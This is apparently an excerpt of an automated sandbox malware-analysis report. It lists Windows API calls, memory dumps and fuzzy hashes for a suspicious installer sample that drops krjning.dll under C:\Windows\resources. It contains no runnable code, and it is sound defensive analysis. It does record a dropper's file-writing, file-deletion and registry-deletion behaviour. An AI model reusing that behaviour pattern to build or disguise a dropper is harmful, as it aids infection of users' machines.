                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402875
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                  • String ID:
                                                                  • API String ID: 3294113728-0
                                                                  • Opcode ID: 92b666876386d525bd55a3880e5db59432ef194caa30a2c1e9ac3a4c6e417a2c
                                                                  • Instruction ID: fe2ca1a255c9cd407b5186cb59bdd4cc2173cf127eb101838ad91b4c2232832b
                                                                  • Opcode Fuzzy Hash: 92b666876386d525bd55a3880e5db59432ef194caa30a2c1e9ac3a4c6e417a2c
                                                                  • Instruction Fuzzy Hash: BD317F72800118BBDF11AFA5CE49DAF7E79EF09364F24423AF550762D0CA794E418BA9
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(?,?,0040B578,000000FF,C:\Windows\resources\0809\spaciousness\krjning.dll,00000400,?,?,00000021), ref: 0040252D
                                                                  • lstrlenA.KERNEL32(C:\Windows\resources\0809\spaciousness\krjning.dll,?,?,0040B578,000000FF,C:\Windows\resources\0809\spaciousness\krjning.dll,00000400,?,?,00000021), ref: 00402534
                                                                  • WriteFile.KERNEL32(00000000,?,C:\Windows\resources\0809\spaciousness\krjning.dll,00000000,?,?,00000000,00000011), ref: 00402566
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                                  • String ID: 8$C:\Windows\resources\0809\spaciousness\krjning.dll
                                                                  • API String ID: 1453599865-2401819920
                                                                  • Opcode ID: 7e124297e9d9ce9ffc009518b95baa8f09914a5a0a27f2251f5958ee13e5d7fc
                                                                  • Instruction ID: 789ffc1fd5c9b2491a3bc3a33d6618758842135b745afe85e879194269bc7d47
                                                                  • Opcode Fuzzy Hash: 7e124297e9d9ce9ffc009518b95baa8f09914a5a0a27f2251f5958ee13e5d7fc
                                                                  • Instruction Fuzzy Hash: FF018071A40604BFD700ABB19E8DEAF7278EF6031AF20453BF142B60C1D6B84991962E
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404930
                                                                  • GetMessagePos.USER32 ref: 00404938
                                                                  • ScreenToClient.USER32(?,?), ref: 00404952
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404964
                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0040498A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                                  • Instruction ID: e09b5cbf994b9d20e684e2691b51e71dfbdbe619cf93b48063de1b345cd00843
                                                                  • Opcode Fuzzy Hash: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                                  • Instruction Fuzzy Hash: 14015E71940219BADB00DBA4DD85FFFBBBCAF54711F10012BBB50B61C0C7B499018BA4
                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
                                                                  • MulDiv.KERNEL32(0008773C,00000064,00087740), ref: 00402CC6
                                                                  • wsprintfW.USER32 ref: 00402CD6
                                                                  • SetWindowTextW.USER32(?,?), ref: 00402CE6
                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF8
                                                                  Strings
                                                                  • verifying installer: %d%%, xrefs: 00402CD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: verifying installer: %d%%
                                                                  • API String ID: 1451636040-82062127
                                                                  • Opcode ID: b579be9e180f96ba16c56fb513ac100cc9f2c07574638d36e797e7726839ab9f
                                                                  • Instruction ID: 4408f4c8952a47a194ff67b523293e2f30943602a1885e021f1ba6dd9a58fc5a
                                                                  • Opcode Fuzzy Hash: b579be9e180f96ba16c56fb513ac100cc9f2c07574638d36e797e7726839ab9f
                                                                  • Instruction Fuzzy Hash: FB016270640208BFEF20AF64DD49FEE3B69BB00309F008439FA06A92D0DBB89555CF59
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Close$DeleteEnumOpen
                                                                  • String ID:
                                                                  • API String ID: 1912718029-0
                                                                  • Opcode ID: bd91da1ba0eb139b8caccfea47c3b8adcc0195348a71b7fcd29f2bbb3b0fb127
                                                                  • Instruction ID: 2ec885d680f81863ea04f737883acb0357ac6f266bfb4f4db73bac45c1b80bd2
                                                                  • Opcode Fuzzy Hash: bd91da1ba0eb139b8caccfea47c3b8adcc0195348a71b7fcd29f2bbb3b0fb127
                                                                  • Instruction Fuzzy Hash: AB114671504108FFEF11AF90DE89EAE3B7DEB44348F11007AFA15A10A0D7B59E55AF68
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: f92ed742b8a0ee75496ac175dfe81288d6104d94202d046ff176b173357ff204
                                                                  • Instruction ID: a030428118a1c000f424ff4dfb6ba2235896b41d14b08693192eaf3a016f5733
                                                                  • Opcode Fuzzy Hash: f92ed742b8a0ee75496ac175dfe81288d6104d94202d046ff176b173357ff204
                                                                  • Instruction Fuzzy Hash: 92F0ECB2600508AFDB01DBE4EF88CEEB7BCEB08311B15146AF641F6190DA74AD018B38
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401D44
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                  • CreateFontIndirectW.GDI32(0040CD80), ref: 00401DBC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID:
                                                                  • API String ID: 3808545654-0
                                                                  • Opcode ID: 3f65254f6df241dee570f3d70183f8ea7dab1824b45f5abdba3aefb20010bb6e
                                                                  • Instruction ID: 116310afc90cc01f82b49c11926c77c683d1a1b46be819c55f1a02a8d5d7abe2
                                                                  • Opcode Fuzzy Hash: 3f65254f6df241dee570f3d70183f8ea7dab1824b45f5abdba3aefb20010bb6e
                                                                  • Instruction Fuzzy Hash: DC016D35944640EFEB016BB0AF8AB9A3F74EF55305F104A79F545B62E2CA7804098B2D
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(0042D1F8,0042D1F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 004048C0
                                                                  • wsprintfW.USER32 ref: 004048C9
                                                                  • SetDlgItemTextW.USER32(?,0042D1F8), ref: 004048DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s
                                                                  • API String ID: 3540041739-3551169577
                                                                  • Opcode ID: 5da30bc4b92d9d0c1cfe05e529173974ba3df4af4940e0a2dfa50fc19328e1e1
                                                                  • Instruction ID: 531d837b88f4b702d8d9e34e744ab90cc2584a20199bf08e47c16144e152f227
                                                                  • Opcode Fuzzy Hash: 5da30bc4b92d9d0c1cfe05e529173974ba3df4af4940e0a2dfa50fc19328e1e1
                                                                  • Instruction Fuzzy Hash: CB11E6736002243BDB10A66D9C4AEDF3659DBC2334F14863BFA25F61D1D978891186E8
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: fa0622c80f3ea4c4a1a4fe4c6f91de5de270cf664640931bdd5eb32ff74c1ad7
                                                                  • Instruction ID: d25c1399015d6fc3d8f93c2dcf78642a10d85d9054307dbf3bdfe5c686c79543
                                                                  • Opcode Fuzzy Hash: fa0622c80f3ea4c4a1a4fe4c6f91de5de270cf664640931bdd5eb32ff74c1ad7
                                                                  • Instruction Fuzzy Hash: FC21B371A44208AFEF01AFB0CA4AEAD7B75EF45308F10413EF502B61D1D7B8A941DB18
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,00405EE1,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C98
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00405EE1,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405CB9
                                                                  • RegCloseKey.ADVAPI32(?,?,00405EE1,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405CDC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: : Completed
                                                                  • API String ID: 3677997916-2954849223
                                                                  • Opcode ID: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                  • Instruction ID: 1d06ac5ea4b77b92fe9c69a11a88cf34e34d0d3ad3680f8f47b16bffbdb95091
                                                                  • Opcode Fuzzy Hash: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                  • Instruction Fuzzy Hash: AE01483115060AAADB218F16ED08E9B3BA8FF44350F01402AF945D2260D734D964DFA9
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403213,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004033E1), ref: 004057F2
                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403213,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004033E1), ref: 004057FC
                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 0040580E
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004057EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-823278215
                                                                  • Opcode ID: de9dddfcd7a9d618380513bff0a4e880c88fc064ccebdc1c89e46d65784464cc
                                                                  • Instruction ID: f63ca075a24b3552cb7c5632698c0476d366f5162805e4a7ef835507e0185024
                                                                  • Opcode Fuzzy Hash: de9dddfcd7a9d618380513bff0a4e880c88fc064ccebdc1c89e46d65784464cc
                                                                  • Instruction Fuzzy Hash: 9DD05E21102E20AAD1117B849C08EDB629DEE85300340847BF500B21A1CB7819518BED
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000,00402EE3,00000001,?,?,?,00000000,0040344F,?), ref: 00402D16
                                                                  • GetTickCount.KERNEL32 ref: 00402D34
                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402D51
                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,0040344F,?), ref: 00402D5F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                  • String ID:
                                                                  • API String ID: 2102729457-0
                                                                  • Opcode ID: aed48f930e6cb8163906278dd1a6a8d55546e7dcfd90fdb5b9c2cdca09a853f5
                                                                  • Instruction ID: 0f67fd822d339501c317f9c9290c0d88a12acd91c10ffcc8c100a5c20b21d8f0
                                                                  • Opcode Fuzzy Hash: aed48f930e6cb8163906278dd1a6a8d55546e7dcfd90fdb5b9c2cdca09a853f5
